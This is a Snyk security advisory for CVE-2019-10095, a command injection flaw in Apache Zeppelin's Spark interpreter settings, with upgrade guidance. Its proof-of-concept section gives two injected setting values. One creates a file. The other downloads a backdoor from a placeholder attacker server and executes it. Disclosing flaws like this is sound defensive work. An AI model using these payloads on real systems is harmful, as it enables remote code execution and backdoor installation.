Command Injection Affecting org.apache.zeppelin:zeppelin package, versions [,0.10.0)


Severity

Recommended
0.0
medium
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
1.45% (87th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Command Injection vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-JAVA-ORGAPACHEZEPPELIN-1583438
  • published8 Sept 2021
  • disclosed7 Sept 2021
  • creditHERE Security Team

Introduced: 7 Sep 2021

CVE-2019-10095  (opens in a new tab)
CWE-78  (opens in a new tab)

How to fix?

Upgrade org.apache.zeppelin:zeppelin to version 0.10.0 or higher.

Overview

org.apache.zeppelin:zeppelin is a web-based notebook that enables interactive data analytics.

Affected versions of this package are vulnerable to Command Injection. Bash command injection vulnerability in Apache Zeppelin allows an attacker to inject system commands into Spark interpreter settings.

PoC

# Insert into Spark interpreter settings
# This example will also crash Spark jobs because command line is truncated
spark.executor.memory=16g;touch${IFS%?}/tmp/test

Or another example, in this case Spark jobs will be executed normally without interruption

spark.driver.cores=2{wget,-O,/tmp/x,http://attacker_server:443/backdoor};{chmod,0755,/tmp/x};{bash,-c,/tmp/x}

CVSS Scores

version 3.1